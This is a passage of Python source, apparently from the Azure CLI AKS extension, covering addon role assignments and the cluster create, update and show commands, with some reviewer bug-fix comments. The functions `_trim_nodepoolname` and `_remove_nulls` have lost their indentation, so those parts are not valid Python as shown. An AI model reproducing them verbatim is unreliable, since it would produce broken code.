        # Let command processing finish gracefully after the user presses [Ctrl+C]
        pass
    finally:
        if in_cloud_console():
            # BUG FIX: close the same port that was opened above (was hard-coded to 8001).
            requests.post('http://localhost:8888/closeport/{0}'.format(listen_port))
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
    """Grant 'Monitoring Metrics Publisher' on the cluster to the identity
    the monitoring (omsagent) addon runs as.

    Prefers the cluster's service principal when one exists; otherwise uses
    the addon's managed identity object id. Failures only produce warnings —
    the cluster operation itself is not aborted.
    """
    service_principal_msi_id = None
    # Check if service principal exists, if it does, assign permissions to service principal
    # Else, provide permissions to MSI
    if (
        hasattr(result, 'service_principal_profile') and
        hasattr(result.service_principal_profile, 'client_id') and
        result.service_principal_profile.client_id != 'msi'
    ):
        logger.info('valid service principal exists, using it')
        service_principal_msi_id = result.service_principal_profile.client_id
        is_service_principal = True
    elif (
        (hasattr(result, 'addon_profiles')) and
        (CONST_MONITORING_ADDON_NAME in result.addon_profiles) and
        (hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME], 'identity')) and
        (hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity, 'object_id'))
    ):
        logger.info('omsagent MSI exists, using it')
        service_principal_msi_id = result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity.object_id
        is_service_principal = False
    if service_principal_msi_id is not None:
        if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
                                    service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
            logger.warning('Could not create a role assignment for Monitoring addon. '
                           'Are you an Owner on this subscription?')
    else:
        # BUG FIX: implicit concatenation was missing a space and logged "roleassignment".
        logger.warning('Could not find service principal or user assigned MSI for role '
                       'assignment')
def _add_ingress_appgw_addon_role_assignment(result, cmd):
    """Grant the AGIC (ingress application gateway) addon identity the roles it
    needs on the gateway's resource group, the configured subnet, or the node
    subnet's virtual network, depending on which addon config keys are present.

    Uses the cluster's service principal when present, otherwise the addon's
    managed identity. Each failed assignment only logs a warning.
    """
    service_principal_msi_id = None
    # Check if service principal exists, if it does, assign permissions to service principal
    # Else, provide permissions to MSI
    if (
        hasattr(result, 'service_principal_profile') and
        hasattr(result.service_principal_profile, 'client_id') and
        result.service_principal_profile.client_id != 'msi'
    ):
        service_principal_msi_id = result.service_principal_profile.client_id
        is_service_principal = True
    elif (
        (hasattr(result, 'addon_profiles')) and
        (CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and
        (hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and
        (hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id'))
    ):
        service_principal_msi_id = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id
        is_service_principal = False
    if service_principal_msi_id is not None:
        config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config
        from msrestazure.tools import parse_resource_id, resource_id
        # Existing gateway supplied by id: Contributor on the gateway's resource group.
        if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config:
            appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
            parsed_appgw_id = parse_resource_id(appgw_id)
            appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"],
                                         resource_group=parsed_appgw_id["resource_group"])
            if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
                                        service_principal_msi_id, is_service_principal, scope=appgw_group_id):
                logger.warning('Could not create a role assignment for application gateway: %s '
                               'specified in %s addon. '
                               'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
        # Gateway to be created in an existing subnet: Network Contributor on that subnet.
        if CONST_INGRESS_APPGW_SUBNET_ID in config:
            subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID]
            if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
                                        service_principal_msi_id, is_service_principal, scope=subnet_id):
                logger.warning('Could not create a role assignment for subnet: %s '
                               'specified in %s addon. '
                               'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
        # Subnet to be created from a CIDR: Contributor on the node pool's vnet.
        if CONST_INGRESS_APPGW_SUBNET_CIDR in config:
            if result.agent_pool_profiles[0].vnet_subnet_id is not None:
                parsed_subnet_vnet_id = parse_resource_id(result.agent_pool_profiles[0].vnet_subnet_id)
                vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"],
                                      resource_group=parsed_subnet_vnet_id["resource_group"],
                                      namespace="Microsoft.Network",
                                      type="virtualNetworks",
                                      name=parsed_subnet_vnet_id["name"])
                if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
                                            service_principal_msi_id, is_service_principal, scope=vnet_id):
                    logger.warning('Could not create a role assignment for virtual network: %s '
                                   'specified in %s addon. '
                                   'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
def aks_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
               client,
               resource_group_name,
               name,
               ssh_key_value,
               dns_name_prefix=None,
               location=None,
               admin_username="azureuser",
               windows_admin_username=None,
               windows_admin_password=None,
               enable_ahub=False,
               kubernetes_version='',
               node_vm_size="Standard_DS2_v2",
               node_osdisk_type=None,
               node_osdisk_size=0,
               node_osdisk_diskencryptionset_id=None,
               node_count=3,
               nodepool_name="nodepool1",
               nodepool_tags=None,
               nodepool_labels=None,
               service_principal=None, client_secret=None,
               no_ssh_key=False,
               disable_rbac=None,
               enable_rbac=None,
               enable_vmss=None,
               vm_set_type=None,
               skip_subnet_role_assignment=False,
               enable_cluster_autoscaler=False,
               cluster_autoscaler_profile=None,
               network_plugin=None,
               network_policy=None,
               pod_cidr=None,
               service_cidr=None,
               dns_service_ip=None,
               docker_bridge_address=None,
               load_balancer_sku=None,
               load_balancer_managed_outbound_ip_count=None,
               load_balancer_outbound_ips=None,
               load_balancer_outbound_ip_prefixes=None,
               load_balancer_outbound_ports=None,
               load_balancer_idle_timeout=None,
               outbound_type=None,
               enable_addons=None,
               workspace_resource_id=None,
               min_count=None,
               max_count=None,
               vnet_subnet_id=None,
               pod_subnet_id=None,
               ppg=None,
               max_pods=0,
               aad_client_app_id=None,
               aad_server_app_id=None,
               aad_server_app_secret=None,
               aad_tenant_id=None,
               tags=None,
               node_zones=None,
               enable_node_public_ip=False,
               generate_ssh_keys=False, # pylint: disable=unused-argument
               enable_pod_security_policy=False,
               node_resource_group=None,
               uptime_sla=False,
               attach_acr=None,
               enable_private_cluster=False,
               private_dns_zone=None,
               enable_managed_identity=False,
               api_server_authorized_ip_ranges=None,
               aks_custom_headers=None,
               appgw_name=None,
               appgw_subnet_prefix=None,
               appgw_subnet_cidr=None,
               appgw_id=None,
               appgw_subnet_id=None,
               appgw_watch_namespace=None,
               enable_aad=False,
               enable_azure_rbac=False,
               aad_admin_group_object_ids=None,
               disable_sgxquotehelper=False,
               kubelet_config=None,
               linux_os_config=None,
               assign_identity=None,
               auto_upgrade_channel=None,
               enable_pod_identity=False,
               no_wait=False):
    """Create a managed AKS cluster.

    Translates the CLI options into a ManagedCluster model (agent pool,
    SSH/Windows profiles, service principal, networking, addons, AAD,
    identity, API-server access, SKU) and submits it via
    _put_managed_cluster_ensuring_permission, retrying on AAD propagation
    errors. Returns whatever that helper returns for the created cluster.
    """
    # Validate the SSH key up front unless the caller opted out of SSH access.
    if not no_ssh_key:
        try:
            if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
                raise ValueError()
        except (TypeError, ValueError):
            shortened_key = truncate_text(ssh_key_value)
            raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
    # Derive defaults that depend on the subscription / resource group.
    subscription_id = get_subscription_id(cmd.cli_ctx)
    if not dns_name_prefix:
        dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
    rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
    if location is None:
        location = rg_location
    # Flag to be removed, kept for back-compatibility only. Remove the below section
    # when we deprecate the enable-vmss flag
    if enable_vmss:
        if vm_set_type and vm_set_type.lower() != "VirtualMachineScaleSets".lower():
            raise CLIError('enable-vmss and provided vm_set_type ({}) are conflicting with each other'.
                           format(vm_set_type))
        vm_set_type = "VirtualMachineScaleSets"
    vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
    load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version)
    if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
        raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
    # System-mode Linux agent pool built from the node_* options.
    agent_pool_profile = ManagedClusterAgentPoolProfile(
        name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
        tags=nodepool_tags,
        node_labels=nodepool_labels,
        count=int(node_count),
        vm_size=node_vm_size,
        os_type="Linux",
        mode="System",
        vnet_subnet_id=vnet_subnet_id,
        pod_subnet_id=pod_subnet_id,
        proximity_placement_group_id=ppg,
        availability_zones=node_zones,
        enable_node_public_ip=enable_node_public_ip,
        max_pods=int(max_pods) if max_pods else None,
        type=vm_set_type
    )
    if node_osdisk_size:
        agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
    if node_osdisk_type:
        agent_pool_profile.os_disk_type = node_osdisk_type
    _check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
    if kubelet_config:
        agent_pool_profile.kubelet_config = _get_kubelet_config(kubelet_config)
    if linux_os_config:
        agent_pool_profile.linux_os_config = _get_linux_os_config(linux_os_config)
    linux_profile = None
    # LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
    if not no_ssh_key:
        ssh_config = ContainerServiceSshConfiguration(
            public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
        linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
    # Windows profile: prompt for the password interactively when not supplied.
    windows_profile = None
    if windows_admin_username:
        if windows_admin_password is None:
            try:
                windows_admin_password = prompt_pass(msg='windows-admin-password: ', confirm=True)
            except NoTTYException:
                raise CLIError('Please specify both username and password in non-interactive mode.')
        windows_license_type = None
        if enable_ahub:
            windows_license_type = 'Windows_Server'
        windows_profile = ManagedClusterWindowsProfile(
            admin_username=windows_admin_username,
            admin_password=windows_admin_password,
            license_type=windows_license_type)
    # Reuse or create the cluster's service principal.
    principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
                                                  service_principal=service_principal, client_secret=client_secret,
                                                  subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
                                                  location=location, name=name)
    service_principal_profile = ManagedClusterServicePrincipalProfile(
        client_id=principal_obj.get("service_principal"),
        secret=principal_obj.get("client_secret"))
    # ACR pull permission: with managed identity this happens after creation,
    # so --no-wait cannot be honored; with a service principal it is done now.
    if attach_acr:
        if enable_managed_identity:
            if no_wait:
                raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
                               '--no-wait is not allowed, please wait until the whole operation succeeds.')
        else:
            _ensure_aks_acr(cmd.cli_ctx,
                            client_id=service_principal_profile.client_id,
                            acr_name_or_id=attach_acr,
                            subscription_id=subscription_id)
    # Grant Network Contributor on a caller-supplied subnet unless it already exists.
    if (vnet_subnet_id and not skip_subnet_role_assignment and
            not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
        scope = vnet_subnet_id
        identity_client_id = service_principal_profile.client_id
        if enable_managed_identity and assign_identity:
            identity_client_id = _get_user_assigned_identity_client_id(cmd.cli_ctx, assign_identity)
        # NOTE(review): unlike other call sites, is_service_principal is not passed
        # here — confirm _add_role_assignment defaults it appropriately.
        if not _add_role_assignment(
                cmd.cli_ctx,
                'Network Contributor',
                identity_client_id,
                scope=scope):
            logger.warning('Could not create a role assignment for subnet. '
                           'Are you an Owner on this subscription?')
    load_balancer_profile = create_load_balancer_profile(
        load_balancer_managed_outbound_ip_count,
        load_balancer_outbound_ips,
        load_balancer_outbound_ip_prefixes,
        load_balancer_outbound_ports,
        load_balancer_idle_timeout)
    outbound_type = _set_outbound_type(outbound_type, network_plugin, load_balancer_sku, load_balancer_profile)
    # Build a network profile only when any networking option (or a standard LB) requires one.
    network_profile = None
    if any([network_plugin,
            pod_cidr,
            service_cidr,
            dns_service_ip,
            docker_bridge_address,
            network_policy]):
        if not network_plugin:
            raise CLIError('Please explicitly specify the network plugin type')
        if pod_cidr and network_plugin == "azure":
            raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
        network_profile = ContainerServiceNetworkProfile(
            network_plugin=network_plugin,
            pod_cidr=pod_cidr,
            service_cidr=service_cidr,
            dns_service_ip=dns_service_ip,
            docker_bridge_cidr=docker_bridge_address,
            network_policy=network_policy,
            load_balancer_sku=load_balancer_sku.lower(),
            load_balancer_profile=load_balancer_profile,
            outbound_type=outbound_type
        )
    else:
        if load_balancer_sku.lower() == "standard" or load_balancer_profile:
            network_profile = ContainerServiceNetworkProfile(
                network_plugin="kubenet",
                load_balancer_sku=load_balancer_sku.lower(),
                load_balancer_profile=load_balancer_profile,
                outbound_type=outbound_type,
            )
        if load_balancer_sku.lower() == "basic":
            network_profile = ContainerServiceNetworkProfile(
                load_balancer_sku=load_balancer_sku.lower(),
            )
    # Translate --enable-addons and its companion options into addon profiles.
    addon_profiles = _handle_addons_args(
        cmd,
        enable_addons,
        subscription_id,
        resource_group_name,
        {},
        workspace_resource_id,
        appgw_name,
        appgw_subnet_prefix,
        appgw_subnet_cidr,
        appgw_id,
        appgw_subnet_id,
        appgw_watch_namespace,
        disable_sgxquotehelper
    )
    monitoring = False
    if CONST_MONITORING_ADDON_NAME in addon_profiles:
        monitoring = True
        _ensure_container_insights_for_monitoring(cmd, addon_profiles[CONST_MONITORING_ADDON_NAME])
    # addon is in the list and is enabled
    ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \
        addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
    # AAD integration: managed AAD (--enable-aad) and legacy client/server-app
    # AAD are mutually exclusive.
    aad_profile = None
    if enable_aad:
        if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
            raise CLIError('"--enable-aad" cannot be used together with '
                           '"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
        aad_profile = ManagedClusterAADProfile(
            managed=True,
            enable_azure_rbac=enable_azure_rbac,
            admin_group_object_ids=_parse_comma_separated_list(aad_admin_group_object_ids),
            tenant_id=aad_tenant_id
        )
    else:
        if aad_admin_group_object_ids is not None:
            raise CLIError('"--admin-aad-object-id" can only be used together with "--enable-aad"')
        if enable_azure_rbac is True:
            raise CLIError('"--enable-azure-rbac" can only be used together with "--enable-aad"')
        if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
            aad_profile = ManagedClusterAADProfile(
                client_app_id=aad_client_app_id,
                server_app_id=aad_server_app_id,
                server_app_secret=aad_server_app_secret,
                tenant_id=aad_tenant_id
            )
    # Check that both --disable-rbac and --enable-rbac weren't provided
    if all([disable_rbac, enable_rbac]):
        raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
    api_server_access_profile = None
    if api_server_authorized_ip_ranges:
        api_server_access_profile = _populate_api_server_access_profile(api_server_authorized_ip_ranges)
    # Cluster identity: system-assigned or a caller-supplied user-assigned identity.
    identity = None
    if not enable_managed_identity and assign_identity:
        raise CLIError('--assign-identity can only be specified when --enable-managed-identity is specified')
    if enable_managed_identity and not assign_identity:
        identity = ManagedClusterIdentity(
            type="SystemAssigned"
        )
    elif enable_managed_identity and assign_identity:
        user_assigned_identity = {
            assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue()
        }
        identity = ManagedClusterIdentity(
            type="UserAssigned",
            user_assigned_identities=user_assigned_identity
        )
    pod_identity_profile = None
    if enable_pod_identity:
        if not enable_managed_identity:
            raise CLIError('--enable-pod-identity can only be specified when --enable-managed-identity is specified')
        pod_identity_profile = ManagedClusterPodIdentityProfile(enabled=True)
    # RBAC defaults to enabled unless explicitly disabled.
    enable_rbac = True
    if disable_rbac:
        enable_rbac = False
    auto_upgrade_profile = None
    if auto_upgrade_channel is not None:
        auto_upgrade_profile = ManagedClusterAutoUpgradeProfile(upgrade_channel=auto_upgrade_channel)
    # Assemble the full cluster model from the pieces built above.
    mc = ManagedCluster(
        location=location, tags=tags,
        dns_prefix=dns_name_prefix,
        kubernetes_version=kubernetes_version,
        enable_rbac=enable_rbac,
        agent_pool_profiles=[agent_pool_profile],
        linux_profile=linux_profile,
        windows_profile=windows_profile,
        service_principal_profile=service_principal_profile,
        network_profile=network_profile,
        addon_profiles=addon_profiles,
        aad_profile=aad_profile,
        auto_scaler_profile=cluster_autoscaler_profile,
        enable_pod_security_policy=bool(enable_pod_security_policy),
        identity=identity,
        disk_encryption_set_id=node_osdisk_diskencryptionset_id,
        api_server_access_profile=api_server_access_profile,
        auto_upgrade_profile=auto_upgrade_profile,
        pod_identity_profile=pod_identity_profile)
    if node_resource_group:
        mc.node_resource_group = node_resource_group
    if enable_private_cluster:
        if load_balancer_sku.lower() != "standard":
            raise CLIError("Please use standard load balancer for private cluster")
        mc.api_server_access_profile = ManagedClusterAPIServerAccessProfile(
            enable_private_cluster=True
        )
    if private_dns_zone:
        if not enable_private_cluster:
            raise CLIError("Invalid private dns zone for public cluster. It should always be empty for public cluster")
        # remove following check once we support custom private dns zone
        if private_dns_zone not in (CONST_PRIVATE_DNS_ZONE_SYSTEM, CONST_PRIVATE_DNS_ZONE_NONE):
            raise CLIError("Invalid private dns zone for private cluster. Only 'system' or 'none' mode is supported")
        mc.api_server_access_profile.private_dns_zone = private_dns_zone
    if uptime_sla:
        mc.sku = ManagedClusterSKU(
            name="Basic",
            tier="Paid"
        )
    headers = get_aks_custom_headers(aks_custom_headers)
    # Due to SPN replication latency, we do a few retries here
    max_retry = 30
    retry_exception = Exception(None)
    for _ in range(0, max_retry):
        try:
            created_cluster = _put_managed_cluster_ensuring_permission(
                cmd,
                client,
                subscription_id,
                resource_group_name,
                name,
                mc,
                monitoring,
                ingress_appgw_addon_enabled,
                enable_managed_identity,
                attach_acr,
                headers,
                no_wait)
            return created_cluster
        except CloudError as ex:
            retry_exception = ex
            # Only retry on AAD propagation errors; anything else is fatal.
            if 'not found in Active Directory tenant' in ex.message:
                time.sleep(3)
            else:
                raise ex
    raise retry_exception
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
               client,
               resource_group_name,
               name,
               enable_cluster_autoscaler=False,
               disable_cluster_autoscaler=False,
               update_cluster_autoscaler=False,
               cluster_autoscaler_profile=None,
               min_count=None, max_count=None, no_wait=False,
               load_balancer_managed_outbound_ip_count=None,
               load_balancer_outbound_ips=None,
               load_balancer_outbound_ip_prefixes=None,
               load_balancer_outbound_ports=None,
               load_balancer_idle_timeout=None,
               api_server_authorized_ip_ranges=None,
               enable_pod_security_policy=False,
               disable_pod_security_policy=False,
               attach_acr=None,
               detach_acr=None,
               uptime_sla=False,
               enable_aad=False,
               aad_tenant_id=None,
               aad_admin_group_object_ids=None,
               enable_ahub=False,
               disable_ahub=False,
               aks_custom_headers=None,
               auto_upgrade_channel=None,
               enable_managed_identity=False,
               assign_identity=None,
               enable_pod_identity=False,
               disable_pod_identity=False,
               yes=False):
    """Update settings of an existing managed cluster.

    Fetches the ManagedCluster model, applies whichever independent updates
    were requested (cluster autoscaler, pod security policy, load balancer
    profile, ACR attach/detach, uptime SLA, AAD, AHUB, auto-upgrade channel,
    managed identity, pod identity, authorized IP ranges) and PUTs it back.

    Raises CLIError when no update flag is given, when flags conflict, or
    when a requested update is invalid for the cluster's current state.
    Returns None when the operation is a no-op or the user declines a prompt.
    """
    update_autoscaler = enable_cluster_autoscaler or disable_cluster_autoscaler or update_cluster_autoscaler
    update_acr = attach_acr is not None or detach_acr is not None
    update_pod_security = enable_pod_security_policy or disable_pod_security_policy
    update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
                                                         load_balancer_outbound_ips,
                                                         load_balancer_outbound_ip_prefixes,
                                                         load_balancer_outbound_ports,
                                                         load_balancer_idle_timeout)
    update_aad_profile = not (aad_tenant_id is None and aad_admin_group_object_ids is None)
    # Error out early if the caller asked for nothing at all.
    # NOTE: the original condition tested `not update_lb_profile` twice; the
    # duplicate has been removed.
    # pylint: disable=too-many-boolean-expressions
    if not update_autoscaler and \
       cluster_autoscaler_profile is None and \
       not update_acr and \
       not update_lb_profile and \
       api_server_authorized_ip_ranges is None and \
       not update_pod_security and \
       not uptime_sla and \
       not enable_aad and \
       not update_aad_profile and \
       not enable_ahub and \
       not disable_ahub and \
       not auto_upgrade_channel and \
       not enable_managed_identity and \
       not assign_identity and \
       not enable_pod_identity and \
       not disable_pod_identity:
        raise CLIError('Please specify "--enable-cluster-autoscaler" or '
                       '"--disable-cluster-autoscaler" or '
                       '"--update-cluster-autoscaler" or '
                       '"--cluster-autoscaler-profile" or '
                       '"--enable-pod-security-policy" or '
                       '"--disable-pod-security-policy" or '
                       '"--api-server-authorized-ip-ranges" or '
                       '"--attach-acr" or '
                       '"--detach-acr" or '
                       '"--uptime-sla" or '
                       '"--load-balancer-managed-outbound-ip-count" or '
                       '"--load-balancer-outbound-ips" or '
                       '"--load-balancer-outbound-ip-prefixes" or '
                       '"--enable-aad" or '
                       '"--aad-tenant-id" or '
                       '"--aad-admin-group-object-ids" or '
                       '"--enable-ahub" or '
                       '"--disable-ahub" or '
                       '"--enable-managed-identity" or '
                       '"--enable-pod-identity" or '
                       '"--disable-pod-identity" or '
                       '"--auto-upgrade-channel"')

    instance = client.get(resource_group_name, name)

    # Cluster-level autoscaler flags only make sense for single-pool clusters;
    # multi-pool clusters must use "az aks nodepool".
    if update_autoscaler and len(instance.agent_pool_profiles) > 1:
        raise CLIError('There is more than one node pool in the cluster. Please use "az aks nodepool" command '
                       'to update per node pool auto scaler settings')

    if min_count is None or max_count is None:
        if enable_cluster_autoscaler or update_cluster_autoscaler:
            raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
                           '--update-cluster-autoscaler set.')
    if min_count is not None and max_count is not None:
        if int(min_count) > int(max_count):
            raise CLIError('value of min-count should be less than or equal to value of max-count.')

    if enable_cluster_autoscaler:
        if instance.agent_pool_profiles[0].enable_auto_scaling:
            logger.warning('Cluster autoscaler is already enabled for this managed cluster.\n'
                           'Please run "az aks update --update-cluster-autoscaler" '
                           'if you want to update min-count or max-count.')
            return None
        instance.agent_pool_profiles[0].min_count = int(min_count)
        instance.agent_pool_profiles[0].max_count = int(max_count)
        instance.agent_pool_profiles[0].enable_auto_scaling = True

    if update_cluster_autoscaler:
        if not instance.agent_pool_profiles[0].enable_auto_scaling:
            raise CLIError('Cluster autoscaler is not enabled for this managed cluster.\n'
                           'Run "az aks update --enable-cluster-autoscaler" '
                           'to enable cluster with min-count and max-count.')
        instance.agent_pool_profiles[0].min_count = int(min_count)
        instance.agent_pool_profiles[0].max_count = int(max_count)

    if disable_cluster_autoscaler:
        if not instance.agent_pool_profiles[0].enable_auto_scaling:
            logger.warning('Cluster autoscaler is already disabled for this managed cluster.')
            return None
        instance.agent_pool_profiles[0].enable_auto_scaling = False
        instance.agent_pool_profiles[0].min_count = None
        instance.agent_pool_profiles[0].max_count = None

    # if intention is to clear profile
    if cluster_autoscaler_profile == {}:
        instance.auto_scaler_profile = {}
    # else profile is provided, update instance profile if it exists
    elif cluster_autoscaler_profile:
        instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
                                                    dict((key.replace("-", "_"), value)
                                                         for (key, value) in cluster_autoscaler_profile.items())) \
            if instance.auto_scaler_profile else cluster_autoscaler_profile

    if enable_pod_security_policy and disable_pod_security_policy:
        raise CLIError('Cannot specify --enable-pod-security-policy and --disable-pod-security-policy '
                       'at the same time.')

    if enable_pod_security_policy:
        instance.enable_pod_security_policy = True

    if disable_pod_security_policy:
        instance.enable_pod_security_policy = False

    if update_lb_profile:
        instance.network_profile.load_balancer_profile = update_load_balancer_profile(
            load_balancer_managed_outbound_ip_count,
            load_balancer_outbound_ips,
            load_balancer_outbound_ip_prefixes,
            load_balancer_outbound_ports,
            load_balancer_idle_timeout,
            instance.network_profile.load_balancer_profile)

    if attach_acr and detach_acr:
        raise CLIError('Cannot specify "--attach-acr" and "--detach-acr" at the same time.')

    if uptime_sla:
        instance.sku = ManagedClusterSKU(
            name="Basic",
            tier="Paid"
        )

    subscription_id = get_subscription_id(cmd.cli_ctx)
    # Resolve the identity used for ACR role assignments: kubelet identity on
    # MSI clusters, otherwise the service principal.
    client_id = ""
    if _is_msi_cluster(instance):
        if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
            raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
                           'Please do not set --attach-acr or --detach-acr. '
                           'You can manually grant or revoke permission to the identity named '
                           '<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
        client_id = instance.identity_profile["kubeletidentity"].client_id
    else:
        client_id = instance.service_principal_profile.client_id
    if not client_id:
        raise CLIError('Cannot get the AKS cluster\'s service principal.')

    if attach_acr:
        _ensure_aks_acr(cmd.cli_ctx,
                        client_id=client_id,
                        acr_name_or_id=attach_acr,
                        subscription_id=subscription_id)

    if detach_acr:
        _ensure_aks_acr(cmd.cli_ctx,
                        client_id=client_id,
                        acr_name_or_id=detach_acr,
                        subscription_id=subscription_id,
                        detach=True)

    # empty string is valid as it disables ip whitelisting
    if api_server_authorized_ip_ranges is not None:
        instance.api_server_access_profile = \
            _populate_api_server_access_profile(api_server_authorized_ip_ranges, instance)

    if enable_aad:
        if instance.aad_profile is not None and instance.aad_profile.managed:
            raise CLIError('Cannot specify "--enable-aad" if managed AAD is already enabled')
        instance.aad_profile = ManagedClusterAADProfile(
            managed=True
        )

    if update_aad_profile:
        if instance.aad_profile is None or not instance.aad_profile.managed:
            raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids"'
                           ' if managed AAD is not enabled')
        if aad_tenant_id is not None:
            instance.aad_profile.tenant_id = aad_tenant_id
        if aad_admin_group_object_ids is not None:
            instance.aad_profile.admin_group_object_ids = _parse_comma_separated_list(aad_admin_group_object_ids)

    if enable_ahub and disable_ahub:
        raise CLIError('Cannot specify "--enable-ahub" and "--disable-ahub" at the same time')

    if enable_ahub:
        instance.windows_profile.license_type = 'Windows_Server'
    if disable_ahub:
        instance.windows_profile.license_type = 'None'

    if instance.auto_upgrade_profile is None:
        instance.auto_upgrade_profile = ManagedClusterAutoUpgradeProfile()

    if auto_upgrade_channel is not None:
        instance.auto_upgrade_profile.upgrade_channel = auto_upgrade_channel

    if not enable_managed_identity and assign_identity:
        raise CLIError('--assign-identity can only be specified when --enable-managed-identity is specified')
    # Identity migration: compare the current identity type with the requested
    # one and prompt before switching (kubelet keeps the SP until pool upgrade).
    current_identity_type = "spn"
    if instance.identity is not None:
        current_identity_type = instance.identity.type.casefold()

    goal_identity_type = current_identity_type
    if enable_managed_identity:
        if not assign_identity:
            goal_identity_type = "systemassigned"
        else:
            goal_identity_type = "userassigned"

    if current_identity_type != goal_identity_type:
        from knack.prompting import prompt_y_n
        msg = ""
        if current_identity_type == "spn":
            msg = ('Your cluster is using service principal, and you are going to update the cluster to use {} managed identity.\n'
                   'After updating, your cluster\'s control plane and addon pods will switch to use managed identity, but kubelet '
                   'will KEEP USING SERVICE PRINCIPAL until you upgrade your agentpool.\n '
                   'Are you sure you want to perform this operation?').format(goal_identity_type)
        else:
            msg = ('Your cluster is already using {} managed identity, and you are going to update the cluster to use {} managed identity. \n'
                   'Are you sure you want to perform this operation?').format(current_identity_type, goal_identity_type)
        if not yes and not prompt_y_n(msg, default="n"):
            return None
        if goal_identity_type == "systemassigned":
            instance.identity = ManagedClusterIdentity(
                type="SystemAssigned"
            )
        elif goal_identity_type == "userassigned":
            user_assigned_identity = {
                assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue()
            }
            instance.identity = ManagedClusterIdentity(
                type="UserAssigned",
                user_assigned_identities=user_assigned_identity
            )

    if enable_pod_identity:
        _update_addon_pod_identity(instance, enable=True)
    if disable_pod_identity:
        _update_addon_pod_identity(instance, enable=False)

    headers = get_aks_custom_headers(aks_custom_headers)

    monitoring_addon_enabled = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
        instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
    ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and \
        instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled

    return _put_managed_cluster_ensuring_permission(cmd,
                                                    client,
                                                    subscription_id,
                                                    resource_group_name,
                                                    name,
                                                    instance,
                                                    monitoring_addon_enabled,
                                                    ingress_appgw_addon_enabled,
                                                    _is_msi_cluster(instance),
                                                    attach_acr,
                                                    headers,
                                                    no_wait)
def aks_show(cmd, client, resource_group_name, name):  # pylint: disable=unused-argument
    """Fetch a managed cluster and return it with distracting null fields stripped."""
    managed_cluster = client.get(resource_group_name, name)
    cleaned = _remove_nulls([managed_cluster])
    return cleaned[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
